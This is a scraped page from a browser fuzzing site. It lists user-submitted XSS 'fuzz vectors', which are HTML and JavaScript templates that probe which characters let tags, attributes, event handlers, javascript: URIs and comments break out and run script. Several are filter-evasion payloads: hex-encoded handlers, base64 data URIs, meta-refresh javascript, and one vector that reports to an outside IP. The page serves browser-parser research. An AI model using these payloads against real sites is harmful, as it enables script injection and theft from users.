Featured vector

No vectors found in the last 30 days

Fuzz vector cloud

2,442,825 Successful fuzzes

Fuzz Vectors

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Possibility of XSS via lead bytes <html> <head> <title>Possibility of XSS via lead bytes... @irsdl</title> <!-- <meta charset="utf-8"> or <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> Ref: https://code.google.com/p/doctype-mirror/wiki/MetaCharsetAttribute --> </head> <body> <p><input size=20 value="*chr*"></p> <p><input size=20 value="<script>logChr(*num*)</script>"></p> <!-- References: http://powerofcommunity.net/poc2008/hasegawa.pptx http://websecurity.com.ua/2928/ https://bugzilla.mozilla.org/show_bug.cgi?id=690225 --> </body> </html> @irsdl
Characters allowed at the start of a namespace <*chr*foo:img src="xx:xx" id="baz*num*" /> <script> if(document.getElementById("baz*num*")) { logChr(*num*); } </script> @agasfasgasdasds
test3_kinmen <!-- sample vector --> <img src=http://www.kinmen.gov.tw/*chr* onerror=logChr(*num*)> @kinmenhacker
String quotes in JS context <script>s*num* = *chr**num**chr*;if (typeof s*num* == "string" && s*num* == "*num*") logChr(*num*);</script> @blubbfiction
before_img <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> @han7er
o replacement in event handlers <img src=xx:xx *chr*nerror=logChr(*num*)> @blubbfiction
Characters that close tags <script*chr*logChr(*num*)</script> @blubbfiction
Valid characters between attribute and value instead of <img src=xx:xx onerror*chr*logChr(*num*)> @blubbfiction
Replacement characters for between attribute and value <img src=xx:xx onerror*chr*logChr(*num*)> @blubbfiction
Characters that close a HTML comment 4 <!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @irsdl
Characters that separate JavaScript object key and value <script> var obj = {"foo"*chr*"bar"}; logChr(*num*) </script> @peksa
JavaScript operators that separate objects and scopes <script> var v = {}*chr*{"string in blockscope"} logChr(*num*) </script> @peksa
JavaScript operators that evaluate argument in variable assignment <script> var v = {}*chr*logChr(*num*) </script> @peksa
Things that break from URIs javascript comments <a href="javascript://*chr*logChr(*num*)">aaa</a> @0xAli
Characters allowed between event handlers and equal sign <img src="about:blank" onerror*chr*=logChr(*num*)> @peksa
HTML input image tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> @peksa
HTML input tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> @peksa
Characters that start JavaScript double quote strings <script> *chr*"; logChr(*num*) </script> @peksa
Characters that escape JavaScript single line comments <script> // hmm *chr*logChr(*num*) </script> @peksa
Ignored characters in javascript protocol uris <script> var a = document.createElement('a'); a.href = "java\u*hex4*script:alert()"; if (a.href === "javascript:alert()") { logChr(*num*); } </script> @peksa
Characters that escape html input tag <input value="" *chr*<script>logChr(*num*)</script> foo="" type="text"> @peksa
rand chr after opening tag <*chr*img/src=xx:xx on*chr*error=logChr(*num*)> @mehimansu
prompt <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @sharath_unni
replacement *chr*img src=xx:xx onerror=logChr(*num*)> @matttiko
Characters that close a HTML comment 0021 <!--*chr*><img src=xxx:x onerror=log(*num*)> --> @matttiko
script var separator <script> var a = "olol123*chr* <logChr(*num*)// </script> @i_bo0om
svg animate onbegin <svg id="svg" xmlns="http://www.w3.org/2000/svg"> <rect id="rectID" width="100" height="100" fill="green"> <animate id="selfID" onbegin=logChr(*num*) attributeName="x" begin="0s; selfID.end" dur="0.5s" from="0" to="100"/> </rect> </svg> @JohnathanKuskos
char after lt and before still valid html <*chr*,script>logChr(*num*);</script> @p_laguna
stuff <!-- sample vector --> <img src='xx:xx*chr*' onerror='logChr(*num*) baz= '> @largenocream
Characters that separate JavaScript assignment statements <script> var a={}*chr*b={}&logChr(*num*); </script> @Giutro
object data separator <object*chr*data="data:text/html;base64,PHNjcmlwdD5sb2dDaHIoKm51bSopPC9zY3JpcHQ+"></object> @i_bo0om
Characters that allow a new statement to begin2 <script> var a={}*chr*b=logChr(*num*); </script> @tifkin_
Characters that allow a new statement to begin <script> var a={}*chr*logChr(*num*); </script> @tifkin_
testquote <!-- sample vector --> <img src=xx:xx onerror=logChr(*num*)*chr*"> @matttiko
testabc <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @matttiko
Characters that can be used to terminate entities in an href <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> @tifkin_
Data URI What can replace the in data <script src="data*chr*,log(*num*)"></script> @skeptic_fx
Characters that can be used close tags2 <script>logChr(*num*)<*chr*script></script> @tifkin_
Characters allowed between and in HTML entities in style attribute <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> @tifkin_
fssadf dfads fdasf <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @phpdevops
img tag overflow2 <img src=http://runinfinity.com/wp-content/uploads/2012/01/Kinmen_Marathon_coursemap.jpg *chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr* onerror=logChr(*num*)> @kinmenhacker
img tag overflow <img src=xx:xx *chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr* onerror=logChr(*num*)> @kinmenhacker
fuzzer set2 <article onerror=log(*num*) data-animal-type="bird"> <h1>k1nm3n h@ck3r</h1> <p>test</p> <table> <tr><td>datacsspropertynames</td><td>*datacsspropertynames*</td></tr> <tr><td>datadhtmlprops</td><td>*datadhtmlprops*</td></tr> <tr><td>dataentities</td><td>*dataentities*</td></tr> <tr><td>dataevents</td><td>*dataevents*</td></tr> <tr><td>dataevil</td><td>*dataevil*</td></tr> <tr><td>datahtmlattributes</td><td>*datahtmlattributes*</td></tr> <tr><td>datahtmlelements</td><td>*datahtmlelements*</td></tr> <tr><td>datahtmlelements2</td><td>*datahtmlelements2*</td></tr> <tr><td>dataints</td><td>*dataints*</td></tr> <tr><td>datajscsspropertynames</td><td>*datajscsspropertynames*</td></tr> <tr><td>datajsproperties</td><td>*datajsproperties*</td></tr> <tr><td>datajstest</td><td>*datajstest*</td></tr> <tr><td>datajstest2</td><td>*datajstest2*</td></tr> <tr><td>datajstest3</td><td>*datajstest3*</td></tr> <tr><td>datajstest4</td><td>*datajstest4*</td></tr> <tr><td>datajstest5</td><td>*datajstest5*</td></tr> <tr><td>datamyevents</td><td>*datamyevents*</td></tr> <tr><td>dataprotocols</td><td>*dataprotocols*</td></tr> <tr><td>dataShortHtmlAttributes</td><td>*dataShortHtmlAttributes*</td></tr> <tr><td>dataShortHtmlElements</td><td>*dataShortHtmlElements*</td></tr> <tr><td>datasvgelements</td><td>*datasvgelements*</td></tr> </table> </article> @kinmenhacker
html5 article <article onerror=log(*num*) data-animal-type="bird"> <h1>k1nm3n h@ck3r</h1> <p>test</p> <table> <tr><td>datacsspropertynames</td><td>*datacsspropertynames*</td></tr> <tr><td>datadhtmlprops</td><td>*datadhtmlprops*</td></tr> <tr><td>dataentities</td><td>*dataentities*</td></tr> <tr><td>dataevents</td><td>*dataevents*</td></tr> <tr><td>dataevil</td><td>*dataevil*</td></tr> <tr><td>datahtmlattributes</td><td>*datahtmlattributes*</td></tr> <tr><td>datahtmlelements</td><td>*datahtmlelements*</td></tr> <tr><td>datahtmlelements2</td><td>*datahtmlelements2*</td></tr> <tr><td>dataints</td><td>*dataints*</td></tr> <tr><td>datajscsspropertynames</td><td>*datajscsspropertynames*</td></tr> <tr><td>datajsproperties</td><td>*datajsproperties*</td></tr> <tr><td>datajstest</td><td>*datajstest*</td></tr> <tr><td>datajstest2</td><td>*datajstest2*</td></tr> <tr><td>datajstest3</td><td>*datajstest3*</td></tr> <tr><td>datajstest4</td><td>*datajstest4*</td></tr> <tr><td>datajstest5</td><td>*datajstest5*</td></tr> <tr><td>datamyevents</td><td>*datamyevents*</td></tr> <tr><td>dataprotocols</td><td>*dataprotocols*</td></tr> <tr><td>dataShortHtmlAttributes</td><td>*dataShortHtmlAttributes*</td></tr> <tr><td>dataShortHtmlElements</td><td>*dataShortHtmlElements*</td></tr> <tr><td>datasvgelements</td><td>*datasvgelements*</td></tr> </table> </article> @kinmenhacker
Connect back <img src="http://140.134.25.107/?chr=*chr*&num=*num*" onerror=logChr(*num*)> @kinmenhacker
Test iOS html5 <audio controls> <source src="*chr*.*chr*" type="*chr*/*chr*" onerror= log(*num*)> Your browser does not support the audio element. </audio> @kinmenhacker
Separators <svg*chr*onload=logChr(*num*)> @JohnathanKuskos
digits <script>/^\d$/.test('*chr*')&&logChr(*num*);</script> @garethheyes
new lines <script> if(/\s/.test('*uni*')&&!/./.test('*uni*'))logChr(*num*) </script> @garethheyes
spaces <script> if(/\s/.test('*chr*'))logChr(*num*) </script> @garethheyes
Characters to break VBScript comments <script language="vbscript"> '*chr*log(*num*)' </script> @0x6D6172696F
Characters preceding function call inside throw block <body onload=throw[onerror=a=*chr*logChr(*num*),a]> @JohnathanKuskos
chr before alert(1) <input onfocus=*chr*:alert(1) autofocus> @Mramydnei
charecter between two URI <a href="http://*chr*javascript:alert(1)">testxss</a> @Mramydnei
characters that behave like equal signs in attribute value <img src== onerror="a*chr*logChr(*num*)"> @JohnathanKuskos
test for progress <progress value="*num*" max="*num*"></progress> @kinmenhacker
test for tag name <*chr* width="*num*px">*datajstest4**datajstest4**datajstest4**dataShortHtmlAttributes**dataShortHtmlAttributes**dataShortHtmlAttributes**datajstest4* @kinmenhacker
Characters that dont inhibit eventhandlers <img src=xx:xx o*chr*nerror=logChr(*num*)> @tifkin_
im fish <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @Mramydnei
wwwemogiccom <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*num**datajstest4**datacsspropertynames**datacsspropertynames* @vpelss
Characters that make a double quote valid <script> *chr*"; logChr(*num*); </script> @tifkin_
Characters allowed after domain <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed before http <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters that will be mutated to a correct URI 5 <ifr*chr*ame id="lol*num*" src="http://shazzer.co.uk" onload=logChr(*num*);> <i>:)</i> </iframe> @avlidienbrunn
Characters that will be mutated to a correct URI 4 <script> function report*num*(num){ var lol = document.getElementById('lol*num*'); if(/http:\/\/shazzer/.test(lol.src)){ logChr(*num*); } } </script> <iframe id="lol*num*" src="http://*chr*shazzer.co.uk" onload=report*num*(*num*)> <p>The browser does not support iframes.</p> </iframe> @avlidienbrunn
XSS Vector Command Tag <command onmouseover ="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command>*datajscsspropertynames* @rafaybaloch
Characters that will be mutated to a correct URI 3 <script> function report*num*(num){ var lol = document.getElementById('lol*num*'); if(/uk\//.test(lol.src)){ logChr(*num*); } } </script> <iframe id="lol*num*" src="http://shazzer.co.uk*chr*break" onload=report*num*(*num*)> <p>The browser does not support iframes.</p> </iframe> @avlidienbrunn
Characters that can be used close tags <script>logChr(*num*)<*chr*script> @tifkin_
Characters allowed to hex encodings of javascript variables <script> lo\u*chr*0067Chr(*num*); </script> @tifkin_
Characters allowed to hex encode javascript <script> lo\*chr*0067Chr(*num*); </script> @tifkin_
Characters allowed in between dashes to end html comments <!-- -*chr*-> <script>logChr(*num*)</script> --> @JohnathanKuskos
Characters allowed between JS function names and parentheses <script> logChr*chr*(*num*); </script> @tifkin_
Protocols before Javascript to run code by using Flash navigateURL <script> setTimeout("if(document.getElementById('myframe*dataprotocols*').contentWindow.document.location.hash.substring(1)) customLog('*dataprotocols*');",1000) </script> <iframe id="myframe*dataprotocols*" src="http://victim.com/testme/flashtest/link_protocol_test.swf?input=*dataprotocols*javascript:document.location='http://shazzer.co.uk/%23@irsdl'"></iframe> @irsdl
Characters allowed before script tag name <*chr*script> logChr(*num*) </script> @tifkin_
chars allowed between js comment v2 <script>logChr(*num*)*chr*'</script> @insertScript
chars allowed between js comment <script>logChr(*num*)/*chr*/'</script> @insertScript
allowed char in js comment <script>logChr(*num*)<*chr*!-- '</script> @insertScript
Characters that result in multiline strings <script> var a = "*chr* "; logChr(*num*); </script> @tifkin_
Charactes that complete single quote <script> var a=*chr*'; logChr(*num*); </script> @tifkin_
Characters allowed between property accessor and property <script> if(document.*chr*body === document.body) { logChr(*num*); } </script> @tifkin_
Characters that escape escapes <script> var x = "*chr*\"; logChr(*num*); </script> @JohnathanKuskos
Characters that break out of quoted attributes2 <img src="1*chr* onerror="logChr(*num*)"> @tifkin_
img onload with only one char in src <img src=*chr* onload=logChr(*num*)> @insertScript
Characters allowed between 2 consecutive functions <script> function a() {} </script> <img src=1 onerror="a()*chr*logChr(*num*)"> @tifkin_
Characters allowed before single functions in event handlers <img src=1 onerror="*chr*logChr(*num*)"> @tifkin_
Characters that can set event handlers3 <img src=1 onerror*chr*"logChr(*num*)"> @tifkin_
characters which turn into a comment <svg><script>lo<*chr*>gChr(*num*)</script></svg> @insertScript
Characters that break attribute names <img src=# aaa*chr*onerror="logChr(*num*)"> @albinowax
char after lt still valid html <*chr*a href=x onerror=logChr(*num*)> @ethicalhack3r
Characters allowed after string multiline separator <script> var x = "asdf\*chr* asdf"; logChr(*num*); </script> @tifkin_
Characters allowed between attributes <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @tifkin_
lt eating char log <img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"> @insertScript
Characters not encoded with encodeURIComponent <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
Characters not encoded with encodeURI <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
lt eating char v2 <img src=x *chr*> onerror=logChr(*num*)> @insertScript
lt eating char <img src=x *chr*> onerror=logChr(*num*)> @insertScript
Characters after javascript uri <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @insertScript
characters allowd in html entities <a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a> @insertScript
Characters before javascript uri <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @insertScript
Easter challenge min sequence 2 <script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script> @garethheyes
Easter challenge min sequence <script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+*datajstest5*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script> @garethheyes
SVG script <svg><script*chr*>logChr(*num*)</script></svg> @garethheyes
Entities allowed with no semi colon htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){}; @garethheyes
HTML Entity in between and <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> @MisterJyu
JS Property check middle character <img src=xx:xx onerror=window[['log*chr*Chr']](*num*)> @garethheyes
JS Property check ending character <img src=xx:xx onerror=window[['logChr*chr*']](*num*)> @garethheyes
Characters allowed before slashes no protocol <a href="*chr*//google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside slashes no protocol <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash 2 <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after slash <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside http <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed within an attribute name (on()load) "'><img src="xx:xx" on*chr*error="log(*num*);"> @skeptic_fx
Characters transformed in expando attributes <div id="fuzzelement*num*" expando*chr*="123">test</div> @garethheyes
Expandos attributes characters removed <div id="fuzzelement*num*" expando*chr*=123>test</div> @garethheyes
Valid chars before img word in img tag <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> @ontrif
Equals equivalent signs in attributes <!-- sample vector --> <img src=xx:xx onerror*chr*logChr(*num*)> @WisecWisec
meta refresh tag content attribute url overwrite <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> @olemoudi
is my browser leaking location <iframe src=http://businessinfo.co.uk onload="if(/^http:\/\/businessinfo.co.uk\/?/.test(this.contentWindow.location)){logBoolean(true);}else{logBoolean(false)}"></iframe> @garethheyes
Characters between time and URL in meta redirects <meta http-equiv=refresh content="0*chr*javascript:logChr('*num*')"> @avlidienbrunn
Characters allowed inside jsurl <a href="java*chr*script:alert(1)" id="fuzzelement*num*">test</a> @avlidienbrunn
justatest2 <!-- sample vector --> <img*chr*src=xx:xx onerror=logChr(*num*)> @evilcos
Characters allowed instead of forward slash in url <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of colon in js url <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Cookie fuzzing <script> document.cookie='*chr*'; if(document.cookie !== '*chr*') { logChr(*num*,document.cookie); } </script> @garethheyes
Tags that have the onload event <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> @garethheyes
chars allowed after colon v2 htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed in colon v2 htmlStr = '<a href="javascript&col'+*chr*+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed after colon htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*chr*); } }catch(e){}; @heyheyheyhey10
Characters consuming spaces between lt and tag name <*chr* script>logChr(*num*)</script> @blubbfiction
Characters allowed as vbscript variables <img src=x:xx onerror="try {execScript('*chr*=1','vbs');log(*num*);}catch(e){}"> @garethheyes
possible chars in base64 encoding <svg><script xlink:href=YWxl*chr*cnQoMSk= ></script> @heyheyheyhey10
Replacement for s in script tag <*chr*cript>logChr(*num*)</script> @blubbfiction
Replacement for lt in tag *chr*script>logChr(*num*)</script> @blubbfiction
Characters inside script tag name <scr*chr*ipt>logChr(*num*)</script> @blubbfiction
Characters between lt and tag name <*chr*script>logChr(*num*)</script> @blubbfiction
char for fireing onload event <img src=*chr* onload=logChr(*num*)> @heyheyheyhey10
aaaaa <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @goroasd
html dataentities before event handler <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> @testacc40590139
Entities allowed instead of colon for js protocol htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @peksa
Entities allowed after js protocol htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before js protocol htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed inside js protocol htmlStr = '<a href="java'+*dataentities*+'script:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before CSS rule htmlStr = '<div style="'+*dataentities*+'color:#cccccc;"></div>'; document.getElementById('placeholder').innerHTML = htmlStr; if(document.getElementById('placeholder').firstChild.style.color.length) { customLog(*dataentities*); } @garethheyes
img srcX onerroralert(1) <div style="color:red'{}*chr* x:expression(logChr(*num*))*chr*">.</div> @qbye
Break out of HTML element from single quoted attribute <img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'> @peksa
Escaped characters that break out of single quote HTML attribute <img src='xx:x\*chr* onerror="logChr(*num*)">'> @peksa
Characters that escape single quoted HTML attributes <img src='xx:x*chr* onerror="logChr(*num*)">'> @peksa
Marios challenge <*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*><script>if(test == "1") parent.customLog('<*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*>');</script> @0xAli
Characters syntactically equivalent to double quote in HTML attributes `"'><img src="#*chr* onerror=log(*num*)> @p_laguna
Eating backslash <img src=xx:xx onerror="x='*chr*\',logChr(*num*)//'"> @garethheyes
Character allowed after the slash for end script tag <script>alert(logChr(*num*))</*chr*script> @MisterJyu
Character allowed before the slash for end script tag <script>alert(logChr(*num*))<*chr*/script> @MisterJyu
Characters that break out of script variables <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> @garethheyes
Char that allows you to act as a slash in closing tag 2 <script>log(*num*)<*chr*script></script> @notxssninja
Characters that close a HTML comment 3 --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> @DOMXss
Characters that are spaces <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Characters that are new lines <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Attribute separators <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes after hash <img src=xx:xx#*chr*/onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> @garethheyes
JS in img src for selfxss <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> @ethicalhack3r
Char after lt <*chr*script>alert(*num*)</script> @ethicalhack3r
Determine what character can be at the end of the javascript but before the colon <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> @MisterJyu
Characters allowed as slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as gt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as lt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as _ in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as s in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*omehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as h in http <script> !function(){ var a = document.createElement('a'); a.href='\*chr*ttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after colon in url (no slashes) <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after colon in url <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*//somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed between slashes <script> !function(){ var a = document.createElement('a'); a.href='/\*chr*/somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters to end script tag via JavaScript regex 002 <script>log(*num*,1</script*chr*//)</script> @0x6D6172696F
Characters to end script tag via JavaScript regex 001 <script>log(*num*,1</script*chr*/)</script> @0x6D6172696F
foobar <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*datadhtmlprops**datadhtmlprops**datadhtmlprops**datadhtmlprops**hex6**uni* @Sidhpurwala
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
Hex characters allowed after asterix in CSS comments <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> @garethheyes
Characters allowed after asterix in CSS comments <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> @garethheyes
Iframe contentDocument properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Iframe contentWindow properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Document body variables <script> props=props.concat(Object.getOwnPropertyNames(document.body)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(document.body[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Document variables <script> props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document[arguments[0]])customLog(arguments[0]); }catch(e){}; }) </script> @garethheyes
Function variables <script> props=props.concat(Object.getOwnPropertyNames(function(){})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(function(){}[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Object variables <script> props=props.concat(Object.getOwnPropertyNames({})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if({}[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Number variables <script> props=props.concat(Object.getOwnPropertyNames(new Number(123))); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if((123)[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
String variables <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(''[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Regexp variables <script> props=props.concat(Object.getOwnPropertyNames(/a/)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(/a/[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Array variables <script> props=props.concat(Object.getOwnPropertyNames([])); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if([][arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Window variables <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(window[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
